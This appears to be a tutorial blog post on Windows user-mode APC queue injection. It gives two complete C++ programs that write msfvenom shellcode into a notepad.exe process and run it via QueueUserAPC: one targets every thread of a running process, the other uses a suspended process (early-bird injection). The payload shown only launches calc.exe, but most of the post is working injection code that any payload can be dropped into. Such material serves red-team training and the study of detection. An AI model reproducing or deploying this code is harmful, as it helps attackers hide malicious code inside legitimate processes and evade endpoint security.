User Mode APC Queue Injection

Each thread in a program has it’s own Asynchronous Procedure Call (APC) queue. This queue contains a list of functions that are executed when the thread enters an alertable state. “Alertable” essentially means the thread is waiting for something to happen.

Alertable states include the following;

Adding functions to the queue can be done using QueueUserAPC. By abusing APC Queues, we can execute arbitrary code in the context of a remote process.


Remote Thread Injection

The below code adds APC functions to threads in a foreign process by;

  • Getting the process PID using the function GetProcessIdByName()
  • Executing EnumerateRemoteThreads() to determine the remote thread ID’s
  • Allocates heap memory in the remote process using VirtualAllocEx(), and writes shellcode to it with WriteProcessMemory.
  • Finally, QueueUserAPC is called with a pointer to the allocated shellcode buffer, and the thread handle ID’s.

The method signature for QueueUserAPC is;

DWORD QueueUserAPC(
  [in] PAPCFUNC  pfnAPC,     // pointer to our shellcode
  [in] HANDLE    hThread,    // target thread handle
  [in] ULONG_PTR dwData.     // A value passed to the APC function. We can ignore this.
);
#include <windows.h>
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <vector>

DWORD GetProcessIdByName(const TCHAR* processName) {
    PROCESSENTRY32 processEntry;
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return 0; // Unable to create snapshot
    }

    processEntry.dwSize = sizeof(PROCESSENTRY32);
    if (!Process32First(hSnapshot, &processEntry)) {
        CloseHandle(hSnapshot);
        return 0; // Unable to get the first process
    }

    do {
        if (_tcsicmp(processEntry.szExeFile, processName) == 0) {
            CloseHandle(hSnapshot);
            return processEntry.th32ProcessID; // Found the process, return its PID
        }
    } while (Process32Next(hSnapshot, &processEntry));

    CloseHandle(hSnapshot);
    return 0; // Process not found
}

// Function to get a list of threads in a remote process
std::vector<DWORD> EnumerateRemoteThreads(DWORD processId) {
    std::vector<DWORD> threadIds;

    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed to create snapshot of threads" << std::endl;
        return threadIds;
    }

    THREADENTRY32 te;
    te.dwSize = sizeof(THREADENTRY32);

    if (!Thread32First(hSnapshot, &te)) {
        std::cerr << "Failed to get the first thread" << std::endl;
        CloseHandle(hSnapshot);
        return threadIds;
    }

    do {
        if (te.th32OwnerProcessID == processId) {
            threadIds.push_back(te.th32ThreadID);
        }
    } while (Thread32Next(hSnapshot, &te));

    CloseHandle(hSnapshot);
    return threadIds;
}



int main(int argc, char* argv[])
{

    //msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f c
    unsigned char shellcode[] =
    "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
    "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
    "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
    "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
    "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
    "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
    "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
    "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
    "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
    "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
    "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
    "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
    "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
    "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
    "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
    "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
    "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
    "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
    "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
    "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

    const TCHAR* processName = _T("notepad.exe");
    DWORD process_id = GetProcessIdByName(processName);

    //Get a handle to our remote process
    HANDLE process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(process_id));

    // Allocate memory in the remote process
    LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);

    // Write our shellcode to the remote process
    WriteProcessMemory(process_handle, buffer, shellcode, sizeof(shellcode), NULL);

    std::vector<DWORD> threads = EnumerateRemoteThreads(process_id);
   
    // loop over the available threads and inject our APC functions
    for (DWORD thread_id : threads) {
        std::cout << "Injecting into thread ID: " << thread_id << std::endl;
        HANDLE thread_handle = OpenThread(THREAD_ALL_ACCESS, TRUE, thread_id);
        QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0);

    }

    return 0;
}

The above code will work, but will result in the shellcode being executed a large number of times, since we have no way of determining when the remote threads will be entering alertable state in future. We could inject into a smaller number of threads, but then we have no guarantee the code will trigger in a reasonable timeframe, if at all.


Suspended Thread Execution

To get around the problem of multiple procedures executing at once, we can start a suspended process and attached an APC queue function to it, then resume the function. On resuming the process, our code should execute once.

#include <windows.h>
#include <iostream>

int main()
{

    //msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f c
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
        "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
        "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
        "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
        "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
        "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
        "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
        "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
        "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
        "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
        "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
        "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
        "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
        "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
        "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
        "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
        "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
        "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
        "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
        "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";


    LPSTARTUPINFOW startup_info = new STARTUPINFOW();
    startup_info->cb = sizeof(STARTUPINFOW);
    startup_info->dwFlags = STARTF_USESHOWWINDOW;
    PPROCESS_INFORMATION process_info = new PROCESS_INFORMATION();

    wchar_t cmd[] = L"notepad.exe\0";

    // Create suspended notepad process
    CreateProcess( NULL,cmd,NULL, NULL, FALSE,CREATE_NO_WINDOW | CREATE_SUSPENDED, NULL, NULL, startup_info, process_info);

    HANDLE process_handle = process_info->hProcess;
    HANDLE thread_handle = process_info->hThread;

    // Allocate & write memory
    LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof(shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(process_handle, buffer, shellcode, sizeof(shellcode), NULL);

    //Execute the APC
    QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0);

    //Continue the thread
    ResumeThread(thread_handle);

    CloseHandle(thread_handle);
    CloseHandle(process_handle);
}

In Conclusion

This post covered the basics of implementing user mode APC to execute shellcode. Interestingly, Kernel APC‘s after often implemented by EDR solutions to injecting hooking code into a monitored application.